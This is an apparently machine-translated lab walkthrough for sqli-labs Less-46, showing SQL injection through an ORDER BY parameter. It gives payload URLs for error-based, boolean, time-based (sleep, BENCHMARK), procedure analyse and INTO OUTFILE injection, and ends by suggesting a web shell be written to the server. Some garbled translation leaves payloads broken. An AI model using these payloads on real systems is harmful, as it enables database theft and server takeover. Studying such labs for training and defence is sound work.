Less-46
Starting with this, we begin to learn about order by related injections.
The SQL statement for this is $sql = "SELECT * from the Users ORDER by $id";
Try? sort=1 DESC or ASC, which shows different results, indicates that it can be injected. (Ascending or descending sort)
From the SQL statements above, we can see that our injection point is in the argument after the order by, and the order by is different from the injection point in the where, we cannot inject with union. How to inject the order by, let's first look at the documentation for the MySQL official select.
We can inject it with some parameters after order by.
First of all
(1), the number after order by can be used as an injection point. That is, to construct a statement after the order by, so that the statement executes the result as a number, we try to
Http://127.0.0.1/sqli-labs/Less-46/?sort=right (Version (), 1)
No error, but right to left is the same, stating that the number does not work, we consider the Boolean type. At this point we can use error injection and delay injection.
Here you can directly construct a parameter following the sort=. In this case, we can have three forms,
① Add injection statement directly, sort= (select ******)
② uses some functions. such as the rand () function, etc.. Sort=rand (SQL statement)
Ps: Here we can show that the results of Rand (ture) and Rand (FALSE) are not the same.
③ uses and, for example, Sort=1 and (plus SQL statements).
At the same time, the SQL statement can use the method of error injection and delay injection, we can construct the statement flexibly.
Example of error injection
Http://127.0.0.1/sqli-labs/Less-46/?sort= (Select%20count (*)%20from%20information_schema.columns%20group%20by% 20concat (0x3a,0x3a, (Select%20user ()), 0x3a,0x3a,floor (rand ()))
In the example above, you can see the user name of [email protected]
?
Next we'll use Rand () for a demonstration because the above mentioned rand (TRUE) and rand (FALSE) results are not the same.
Http://127.0.0.1/sqli-labs/Less-46/?sort=rand (ASCII (Left (database (), 1)) =115)
?
?
Http://127.0.0.1/sqli-labs/Less-46/?sort=rand (ASCII (Left (database (), 1)) =116)
?
From the results of the above two graphs, comparing rand (ture) and Rand (FALSE) results, it can be seen that error injection is successful.
?
Delay Injection Example
Http://127.0.0.1/sqli-labs/Less-46/?sort=%20 (Select%20if (SUBSTRING (current,1,1) =char (), BENCHMARK (50000000, MD5 (%271%27)), null)%20from%20 (Select%20database ()%20as%20current)%20as%20tb1)
?
Http://127.0.0.1/sqllib/Less-46/?sort=1%20and%20If (ASCII (substr () (Database ()) =116,0,sleep (5))
The above two delay injection examples can be very obvious to see the difference in time, here is not the map, the picture can not show the delay ...
?
You can also add injection statements using the sort=1 and after. This is not a demonstration.
- Procedure analyse parameter after injection
Using the procedure analyse parameter, we can perform an error injection. At the same time, there can be a limit parameter between procedure analyse and order by, and in practice we may also have a limit injection, which can be injected using procedure analyse.
The following is a sample example
Http://127.0.0.1/sqli-labs/Less-46/?sort=1%20%20procedure%20analyse (Extractvalue (rand (), concat (0x3a,version ()) ), 1)
- Import export file into outfile parameter
Http://127.0.0.1/sqllib/less-46/?sort=1%20into%20outfile%20%22c:\\wamp\\www\\sqllib\\test1.txt%22
Import query results into a file
At this time we can consider uploading the Web horse, using lines terminated by.
into Outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x (web horse for 16 binary conversion)
Sqli-labs less 46